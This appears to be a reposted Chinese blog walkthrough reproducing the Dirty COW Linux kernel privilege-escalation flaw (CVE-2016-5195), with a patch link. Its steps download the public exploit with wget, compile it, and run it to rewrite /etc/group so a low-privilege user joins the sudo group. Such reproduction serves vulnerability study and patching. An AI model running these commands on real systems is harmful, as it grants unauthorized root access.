脏牛漏洞复现【转】

漏洞编号:CVE-2016-5195
漏洞名称:脏牛(Dirty COW)
漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权
影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。

成因:Linux内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞,导致可以破坏私有只读内存映射。一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限,有可能进一步导致提权漏洞。

1.POC地址 :#1url:https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c

#1  添加一个用户test   adduser test

#2    wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c       //test用户下载poc

#3    gcc dirtyc0w.c -o dirtyc0w -lpthread        //gcc 编译poc -o 输出 为 dirtyc0w 的可执行文件

#4    ./dirtyc0w /etc/group “$(sed ‘/\(sudo*\)/ s/$/,你添加的用户名/’ /etc/group)”      //执行可执行文件

复现成功。
修复方法:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?

id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619    //补丁地址

此条目发表在未分类, 漏洞攻击分类目录。将固定链接加入收藏夹。

发表评论